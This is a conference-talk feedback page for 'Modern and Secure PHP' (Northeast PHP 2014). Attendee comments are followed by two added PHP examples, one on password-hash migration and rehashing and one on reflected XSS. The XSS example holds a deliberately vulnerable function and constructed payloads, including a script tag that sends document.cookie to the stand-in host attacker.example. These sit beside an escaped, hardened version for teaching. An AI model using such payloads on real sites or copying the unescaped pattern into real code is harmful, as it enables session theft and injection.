Talk in English - US at Northeast PHP 2014
Track Name: Code all the Things
Short URL: https://joind.in/talk/12433
Modern and Secure PHP
Comments
Covered a lot of good topics.
Great summary of the new bits of PHP. Important for a lot of people to hear
You mentioned a lot of things that I either haven't heard of or am not using yet, but should be. It was a little fast-paced, but covered a lot.
Amazing presentation! A lot of materials mentioned in this presentation provided insight to the OOP presentation by Bill Sanders and the Web Security presentation by Oscar from php architect as well. I wish there was a prize hand-out or longer Q&A.
Overall Good job Ben!
Fast-paced talk that introduced a lot of important topics and provided time for Q&A. It was a good idea to put it first since it provided a foundation for other talks. Thank you for speaking Ben.
Covered a couple of the new things people should be using but missed out on a few important pieces of information. Generally either more information could have been provided or links to relevant documentation could have been useful.
I know you're a Laravel guy, but perhaps making the talk agnostic would be good.
Exceptions seemed to be encouraged as a fancy go-to. The example given of throwing an exception on a password failure with an authentication system seems odd because that is normal behaviour in an authentication system.
`password_needs_rehash` is an integral part of the password hashing API and should be spoken of if you're bringing up other parts of it.
As most people who aren't using the password hashing API are likely using legacy methods for password hashing both how to migrate these and ways to secure them would be a good idea. Also an emphasis on storing the entire output of `password_hash` without touching it is usually needed.
Your example of non-persistent XSS is incorrect. The example is more like CSRF than XSS, as you aren't injecting any content into the DOM in the example. A better example would be injecting script tags via GET parameters.
Splitting autoloading and composer may have been a good idea. Composer isn't always a possibility for some users (no idea why) so speaking on autoloading first may be a good idea.
Lastly, while it could have just been nerves or because of the rush from the previous talk going over time (and had it been, this can be ignored), the talk seemed a little rushed and ill-prepared.
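The password hashing points raised in the comment above (migrating legacy hashes, securing them before their owners log in, calling `password_needs_rehash`, and storing the whole `password_hash` output) fit into one login routine. The following is an added example written for this page, not code from the talk or its slides. The in-memory `$users` table, the `legacy` flag, the cost of 12 and the unsalted-MD5 legacy scheme are all assumptions made for illustration; a real application would read and write these rows from its database.

```php
<?php
declare(strict_types=1);

// Assumed cost: tune for your hardware, then raise it over time. Because the
// cost is embedded in the hash string, password_needs_rehash() notices the
// change and each user is upgraded on their next successful login.
const HASH_ALGO = PASSWORD_DEFAULT;
const HASH_OPTIONS = ['cost' => 12];

// Securing legacy rows BEFORE users return: wrap the old unsalted md5() hex
// digest in bcrypt so the database no longer holds a fast, crackable hash.
// Until the user logs in again, verification is password_verify(md5($pw), $hash).
function wrap_legacy_hash(string $md5hex): string
{
    return password_hash($md5hex, HASH_ALGO, HASH_OPTIONS);
}

function store_hash(array &$users, string $name, string $password): void
{
    // Store the ENTIRE string password_hash() returns. Algorithm, cost and
    // salt all live inside it ("$2y$12$..."), so trimming, splitting or
    // lower-casing it breaks password_verify(). Size the column generously
    // (255 chars) so a future PASSWORD_DEFAULT still fits.
    $users[$name] = [
        'hash'   => password_hash($password, HASH_ALGO, HASH_OPTIONS),
        'legacy' => false,
    ];
}

function login(array &$users, string $name, string $password): bool
{
    if (!isset($users[$name])) {
        return false;
    }
    $row = $users[$name];

    if ($row['legacy']) {
        // Wrapped legacy row: check bcrypt(md5(pw)), then, since we hold the
        // plaintext right now, replace it with a proper password_hash().
        if (!password_verify(md5($password), $row['hash'])) {
            return false;
        }
        store_hash($users, $name, $password);
        return true;
    }

    if (!password_verify($password, $row['hash'])) {
        return false;
    }
    // Hash was made with an older cost or algorithm? Rehash while we can.
    if (password_needs_rehash($row['hash'], HASH_ALGO, HASH_OPTIONS)) {
        store_hash($users, $name, $password);
    }
    return true;
}

// Constructed sample table: alice is a migrated legacy user, bob already
// has a bcrypt hash made with the library's default cost.
$users = [
    'alice' => ['hash' => wrap_legacy_hash(md5('correct horse')), 'legacy' => true],
    'bob'   => ['hash' => password_hash('battery staple', PASSWORD_DEFAULT), 'legacy' => false],
];

var_dump(login($users, 'alice', 'wrong'));            // bool(false)
var_dump(login($users, 'alice', 'correct horse'));    // bool(true), row rewritten
var_dump($users['alice']['legacy']);                  // bool(false)
var_dump(password_needs_rehash($users['alice']['hash'], HASH_ALGO, HASH_OPTIONS)); // bool(false)
var_dump(login($users, 'bob', 'battery staple'));     // bool(true), rehashed if cost differed
var_dump(strlen($users['bob']['hash']));              // int(60) for bcrypt
```

One caveat worth keeping in mind: bcrypt only looks at the first 72 bytes of its input, which is fine for a 32-character md5 hex digest but means that, for the wrapped scheme, the security of a legacy row is still bounded by the original unsalted MD5 until the user logs in and gets a fresh hash.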
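The reflected XSS example suggested in the comment above (a script tag arriving through a GET parameter) looks like this in PHP. This is an added example for this page, not code from the talk; the `search.php` endpoint, the `q` parameter and the request array are constructed for illustration.

```php
<?php
declare(strict_types=1);

// Vulnerable: the query string is copied straight into the HTML response.
// Reflected (non-persistent) XSS: nothing is stored, the payload lives in the
// URL the victim was tricked into opening, e.g.
//   https://example.test/search.php?q=%3Cscript%3E...%3C/script%3E
function search_page_vulnerable(array $get): string
{
    $q = $get['q'] ?? '';
    return "<p>Results for: $q</p>\n<input name=\"q\" value=\"$q\">";
}

// Hardened: escape for the HTML context the value is placed in. ENT_QUOTES
// also encodes single and double quotes, which is what stops the attribute
// break-out below; always pass the page's real charset.
function search_page_safe(array $get): string
{
    $q = $get['q'] ?? '';
    $safe = htmlspecialchars($q, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<p>Results for: $safe</p>\n<input name=\"q\" value=\"$safe\">";
}

// Constructed requests, as the victim's browser would send them.
$text_ctx_attack = [
    'q' => '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>',
];
$attr_ctx_attack = [
    'q' => '" autofocus onfocus="alert(document.domain)" x="',
];

echo search_page_vulnerable($text_ctx_attack), "\n"; // <script> lands in the DOM and runs
echo search_page_safe($text_ctx_attack), "\n";       // &lt;script&gt;... rendered as literal text

echo search_page_vulnerable($attr_ctx_attack), "\n"; // closes value="" and adds an event handler
echo search_page_safe($attr_ctx_attack), "\n";       // &quot; keeps the payload inside the attribute
```

Escaping at output time, per context, is the fix; a Content-Security-Policy header is a worthwhile second layer but not a substitute, since the page above is broken regardless of whether the browser agrees to run the injected script.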